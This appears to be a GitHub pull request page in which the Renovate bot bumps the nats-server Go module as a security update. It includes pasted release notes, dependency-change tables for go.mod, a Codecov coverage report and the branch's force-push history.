  • Added meta_compact and meta_compact_size, advanced JetStream config options controlling how many log entries must be present in the metalayer log before snapshotting and compaction take place (#​7484, #​7521)
  • Added write_timeout option for clients, routes, gateways and leafnodes which controls the behaviour on reaching the write_deadline, values can be default, retry or close (#​7513)
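
As a hedged sketch, the new write_timeout option might be set like this — the option name and values come from the release note above; the exact placement per connection type is an assumption:

```
# Behaviour on reaching write_deadline: default, retry or close
write_timeout: retry

leafnodes {
  write_timeout: close
}
```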

Monitoring

  • Meta cluster snapshot statistics have been added to the /jsz endpoint (#​7524)
  • The /jsz endpoint can now show direct consumers with the direct-consumers=true flag (#​7543)
Improved

General

  • Binary stream snapshots are now preferred by default for nodes on new route connections (#​7479)
  • Reduced allocations in the sublist and subject transforms (#​7519)

JetStream

  • Improved the logging for observer mode (#​7433)
  • Improved the performance of enforcing max_bytes and max_msgs limits (#​7455)
  • Streams and consumers will no longer unnecessarily snapshot when being removed or scaling down (#​7495)
  • Streams are now loaded in parallel when enabling JetStream, often reducing the time it takes to start up the server (#​7482)
  • Stream catchups will now use delete ranges more aggressively, speeding up catchups of large streams with many interior deletes (#​7512)
  • Streams with subject transforms can now implicitly republish based on those transforms by configuring > for both republish source and destination (#​7515)
  • A race condition where subscriptions may not be set up before catchup requests are sent after a leader change has been fixed (#​7518)
  • JetStream recovery parallelism now matches the I/O gated semaphore (#​7526)
  • Reduced heap allocations in hash checks (#​7539)
  • Healthchecks now correctly report when streams are catching up, instead of showing them as unhealthy (#​7535)
  • Improved interest detection when consumers are created or deleted across different servers (#​7440)
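
The implicit republish-by-transform behaviour above (#​7515) can be sketched as a stream configuration fragment. The field names (`subject_transform`, `republish`) follow the JetStream stream config JSON, but treat this as an illustration rather than a verified example:

```json
{
  "name": "ORDERS",
  "subjects": ["orders.*"],
  "subject_transform": { "src": "orders.*", "dest": "events.{{wildcard(1)}}" },
  "republish": { "src": ">", "dest": ">" }
}
```

With `>` as both republish source and destination, republished messages follow the stream's own subject transform.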

Monitoring

  • The jsz monitoring endpoint can now report leader counts (#​7429)
Fixed

General

  • When using message tracing, header corruption when setting the hop header has been fixed (#​7443)
  • Shutting down a server using lame-duck mode should no longer result in max connection exceeded errors (#​7527)

JetStream

  • Race conditions and potential panics fixed in the handling of some JetStream API handlers (#​7380)
  • The filestore no longer loses tombstones when using secure erase (#​7384)
  • The filestore no longer loses the last sequence when recovering blocks containing only tombstones (#​7384)
  • The filestore now correctly cleans up empty blocks when selecting the next first block (#​7384)
  • The filestore now correctly obeys sync_always for writing TTL and scheduling state files (#​7385)
  • Fixed a data race on a wait group when mirroring streams (#​7395)
  • Skipped message sequences are now checked for ordering before apply, fixing a potential stream desync on catchups (#​7400)
  • Skipped message sequences now correctly detect gaps from erased message slots, fixing potential cache issues, slow reads and issues with catchups (#​7399, #​7401)
  • Raft groups now report peer activity more consistently, fixing some cases where asset info and monitoring endpoints may report misleading values after leader changes (#​7402)
  • Raft groups will no longer permit truncations from unexpected catchup entries if the catchup is completed (#​7424)
  • The filestore will now correctly release locks when erasing messages returns an error (#​7431)
  • Caches will now no longer expire unnecessarily when re-reading the same sequences multiple times in first-matching code paths (#​7435)
  • A couple of issues related to header handling have been fixed (#​7465)
  • No-wait requests now return a 400 No Messages response correctly if the stream is empty (#​7466)
  • Raft groups will now only report leadership status after a no-op entry on recovery (#​7460)
  • Fixed a race condition in the filestore that could happen between storing messages and shutting down (#​7496)
  • A panic that could occur when recovering streams in parallel has been fixed (#​7503)
  • An off-by-one when detecting holes at the end of a filestore block has been fixed (#​7508)
  • Writing skip message records in the filestore no longer releases and reacquires the lock unnecessarily (#​7508)
  • Fixed a bug on metalayer recovery where stream and consumer monitor goroutines for recreated assets would run with the wrong Raft group (#​7510)
  • Scaling up an asset from R1 now results in an installed snapshot, allowing

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate

renovate bot commented Apr 15, 2025

ℹ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

  • 10 additional dependencies were updated
  • The go directive was updated for compatibility reasons

Details:

Package Change
go 1.22 -> 1.23.0
github.com/nats-io/nats.go v1.36.0 -> v1.39.1
github.com/klauspost/compress v1.17.9 -> v1.18.0
github.com/minio/highwayhash v1.0.2 -> v1.0.3
github.com/nats-io/jwt/v2 v2.5.7 -> v2.7.3
github.com/nats-io/nkeys v0.4.7 -> v0.4.10
go.uber.org/automaxprocs v1.5.3 -> v1.6.0
golang.org/x/crypto v0.24.0 -> v0.34.0
golang.org/x/sys v0.21.0 -> v0.30.0
golang.org/x/text v0.16.0 -> v0.22.0
golang.org/x/time v0.5.0 -> v0.10.0
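
Applied to go.mod, the table above corresponds to a fragment like the following sketch — the go directive and versions are taken from the table; the require layout is illustrative:

```
go 1.23.0

require github.com/nats-io/nats.go v1.39.1
```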

@codecov

codecov bot commented Apr 15, 2025

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 54.81%. Comparing base (3cf2082) to head (a6bcd4a).

Additional details and impacted files
@@           Coverage Diff           @@
##             main      #76   +/-   ##
=======================================
  Coverage   54.81%   54.81%           
=======================================
  Files          25       25           
  Lines        1609     1609           
=======================================
  Hits          882      882           
  Misses        630      630           
  Partials       97       97           

☔ View full report in Codecov by Sentry.

@renovate renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 3cb83fd to 1dd0113 Compare May 7, 2025 11:02
@renovate renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 1dd0113 to 35725fc Compare August 10, 2025 14:04
@renovate renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 35725fc to 69e2624 Compare October 9, 2025 09:53
@renovate

renovate bot commented Dec 15, 2025

ℹ️ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

  • 12 additional dependencies were updated
  • The go directive was updated for compatibility reasons

Details:

Package Change
go 1.22 -> 1.25.0
github.com/nats-io/nats.go v1.36.0 -> v1.49.0
github.com/klauspost/compress v1.17.9 -> v1.18.4
github.com/minio/highwayhash v1.0.2 -> v1.0.4-0.20251030100505-070ab1a87a76
github.com/nats-io/jwt/v2 v2.5.7 -> v2.8.1
github.com/nats-io/nkeys v0.4.7 -> v0.4.15
go.uber.org/automaxprocs v1.5.3 -> v1.6.0
golang.org/x/crypto v0.24.0 -> v0.49.0
golang.org/x/net v0.26.0 -> v0.51.0
golang.org/x/sys v0.21.0 -> v0.42.0
golang.org/x/text v0.16.0 -> v0.35.0
golang.org/x/time v0.5.0 -> v0.15.0
golang.org/x/tools v0.21.1-0.20240508182429-e35e4ccd0d2d -> v0.42.0

@renovate renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 69e2624 to 2765e0c Compare February 24, 2026 19:44
@renovate renovate bot changed the title test: update module github.com/nats-io/nats-server/v2 to v2.10.27 [security] test: update module github.com/nats-io/nats-server/v2 to v2.11.12 [security] Feb 24, 2026
@renovate renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 2765e0c to a6bcd4a Compare March 24, 2026 21:40
@renovate renovate bot changed the title test: update module github.com/nats-io/nats-server/v2 to v2.11.12 [security] test: update module github.com/nats-io/nats-server/v2 to v2.11.15 [security] Mar 24, 2026